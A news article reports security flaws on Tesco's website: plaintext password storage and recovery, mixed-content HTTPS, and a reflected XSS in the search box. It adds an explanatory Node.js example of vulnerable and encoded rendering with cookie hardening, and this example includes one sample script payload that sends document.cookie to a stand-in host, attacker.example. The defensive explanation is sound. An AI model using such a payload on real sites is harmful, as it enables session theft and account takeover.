EXCLUSIVE: TechWeekEurope learns about another flaw in the Tesco website, following this week’s revelations about poor password security
A dangerous flaw has been found on the Tesco website, placing the company’s online customers at risk, TechWeekEurope has learned, just a day after the supermarket chain was lambasted for weak security practices.
Yesterday, security researcher Troy Hunt exposed problems with Tesco's security, including evidence that the site appeared to be storing customer passwords in plain text rather than as salted hashes.
The Tesco.com site was also guilty of “mixed mode HTTPS” (mixed content), where the page itself is loaded over HTTPS but some of its resources are loaded over plain HTTP, giving users “no assurances whatsoever”. Browsers detect this and warn users about it, yet Tesco still has not fixed the issue.
Today it emerged that a cross-site scripting (XSS) flaw on the site could be exploited by hackers to hijack users’ accounts. TechWeekEurope has seen evidence proving that the flaw exists and has warned Tesco about it, but received no response. The XSS code will not be published for the safety of Tesco shoppers.
Victims would then be passed on to the Tesco website, where the attacker's code would be submitted to a Tesco server through the search box on the homepage and reflected back into the page. If engineered correctly, the script would send the victim's session cookie to the attacker's server, giving them access to the victim's account. All of this could happen in seconds, and the user would be left none the wiser.
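To make the mechanism concrete, here is an added example that is not Tesco's code and not the payload reported to the site: a minimal Node.js search-results renderer that copies the query into the page unencoded, the same renderer with HTML output encoding, and the cookie attributes that blunt cookie theft even when a script does run. The hostname attacker.example and the payload string are constructed for the illustration.

```javascript
// Added example, not Tesco's code: a search-results page with a reflected
// XSS bug, its encoded counterpart, and session-cookie hardening.

// Vulnerable: the query is pasted straight into the HTML, so a '<script>'
// tag inside it is parsed as markup and runs in the victim's browser.
function renderSearchVulnerable(query) {
  return `<h1>Results for ${query}</h1>`;
}

// Output encoding for an HTML text node. Every character that can open a
// tag, close an attribute or start an entity is replaced by an entity.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Fixed: the same page, but the query can only ever be text.
function renderSearchSafe(query) {
  return `<h1>Results for ${escapeHtml(query)}</h1>`;
}

// Rough check: does the markup still contain a live <script> element?
// (After encoding, the '<' has become '&lt;' and no longer opens a tag.)
function containsLiveScript(html) {
  return /<script\b/i.test(html);
}

// Session cookie attributes. HttpOnly keeps document.cookie from reading the
// cookie, so the injected script above cannot exfiltrate it; Secure stops it
// being sent with plain-HTTP resources such as the mixed content mentioned in
// the article; SameSite limits cross-site sends.
function sessionCookieHeader(token) {
  return `session=${encodeURIComponent(token)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Constructed payload of the textbook form (not the one reported to Tesco):
// it would post the victim's cookies to a hostname made up for this example.
const PAYLOAD =
  "<script>location='https://attacker.example/?c='+document.cookie</script>";

console.log('vulnerable:', renderSearchVulnerable(PAYLOAD));
console.log('encoded:   ', renderSearchSafe(PAYLOAD));
console.log('cookie:    ', sessionCookieHeader('abc123'));
```

Encoding at the point of output is the fix Hunt calls “very quick”: it does not depend on guessing which inputs are hostile. The cookie attributes are defence in depth, not a substitute; with HttpOnly set, a script that does run can still act as the user while the page is open, it just cannot copy the session token out.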
Hunt claimed the flaw should have been “very easily identified”, adding that Tesco could issue a “very quick fix” for the flaw. Yet there has been no response from the supermarket giant.
The latest WhiteHat Security report showed that over half (55 percent) of all sites contained an XSS flaw in 2011, making it the most common vulnerability on the web.
Hunt said he had also received an unverified claim of an SQL injection flaw on the Tesco website, which could be exploited to expose user information.
As for the password issues highlighted yesterday, Tesco sent over this response: “We know how important Internet security is to customers and the measures we have are robust. We are never complacent and work continuously to give customers the confidence that they can shop securely.”
A spokesperson confirmed the company would be looking into what people were saying online, but did not say if there was any plan for action. He claimed the site had never been hacked and Tesco had never been hit by any major security issue.
Despite online claims that Tesco had fixed the password problem, TechWeekEurope found the site has several different pages for password resets. One of those is more secure, as it takes users through a process of setting a new password. But another gives customers their existing password back in plain text, which is only possible if the site stores passwords in a recoverable form.
“You know what strikes me with this whole thing? There’s someone directing these comments to Tesco customer care, journalists and whoever else is asking that just doesn’t have the faintest clue,” Hunt added.
“It’s not about whether you’ve been hacked or whether you think you’re secure or not, there are blatantly obvious flaws at many levels and they just can’t acknowledge it.”
The security researcher and Microsoft Most Valuable Professional said he had seen 1,720 retweets of a Tesco tweet that said passwords were copied into plain text “when pasted automatically into a password reminder email” – something of a contradiction, since a password can only be pasted into an email if the site can retrieve it, and emailing it in plain text is not a secure way to handle sensitive data. There were also hundreds and possibly thousands of tweets to @UKTesco complaining about the issue, Hunt said.
“They’re just blindly saying ‘everything is fine’. Does that not strike you as odd?” he added.
“I would genuinely like to see them get on top of this, or at the very least understand the issues.”